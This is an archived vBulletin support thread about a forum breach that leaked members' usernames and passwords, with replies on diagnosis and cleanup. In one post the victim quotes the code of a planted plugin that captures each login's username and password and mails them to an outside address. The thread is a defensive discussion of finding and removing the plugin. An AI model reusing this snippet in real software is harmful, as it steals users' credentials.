The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
#11
11-07-2009, 09:45 AM
|
|||
|
|||
Could it be that this script somehow gives an extra login prompt (fake) and that your users are actually entering their info in there?
Save all your files and database. Disable and remove (all files!!) all modifications Disable all your styles and create a new style with no parent (= default style) and set this to be the only style to be used on your board. Check for modified files using AdminCP -> Maintenance -> Suspect file Contact vBulletin support for assistence. 
|
|
#12
11-07-2009, 09:58 AM
|
|||
|
|||
|
This happened on a vB board I'm a member of a few weeks ago. The server was compromised and a harvesting script that prompted usernames and passwords to be entered was planted on the homepage.
These were logged to a txt file and later published online with everyones usernames and passwords. The amount of times a member tried to login was how many times they appeared on the list in the txt file. This is the reason why your username/passwords are in plain text format. They remain encrypted in the database. Get in touch with your host and shut down everything. When your back up make every user change there password.
|
|
#13
11-07-2009, 02:21 PM
|
|||
|
|||
|
found and solved ,
here is what i found on some plugins ! just a mod but tell me plz if this this are the plugins added ! member_complete vb-sec2 login_verify_success vb-sec3 global_setup_complete vb-sec4 misc_start and this is the content of the vb-sec2 $message = "username: " . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "\nPassword:". $vbulletin->db->escape_string(htmlspecialchars_uni($password)); mail('XXXXX@windowslive.com', 'Victim', $message);
|
|
#14
11-07-2009, 02:50 PM
|
|||
|
|||
|
Quote:
Write down the product name, then go into Manage Products and find that product on the list. If the product's name is underlined, then it's clickable. Hover your mouse over that name, right-click, and select Copy Shortcut. Then come back here and paste the link. This will tell us if the product was released on vb.org, or if it came from somewhere else. If the product's name is not underlined, then copy and paste the name, version, and description into your reply here. If the product's name does not show on Manage Products, then return to Plugin Manager and screenshot the listings, and post your screenshots as a reply here. Maybe someone else is familiar with the product and can identify it. It is very important that you let us know which modification did this. vb.org can pull the mod, check the code, and if vb.org sees the code that you have posted above they can notify other forums who have downloaded the mod, warning them not to use it.
|
|
#15
11-09-2009, 08:01 AM
|
|||
|
|||
|
The above script can only sent out real passwords if your config.php file is set to sent plain text passwords to the server. On a default installation plain text passwords are hashed on the client side and never even sent to the server. It is strongly recommended, the proof is in this thread, not to allow unhashed passwords to be sent to the server.
|
 |
«
Previous Thread
|
Next Thread
»
Linear Mode
|
|
All times are GMT. The time now is 04:58 AM.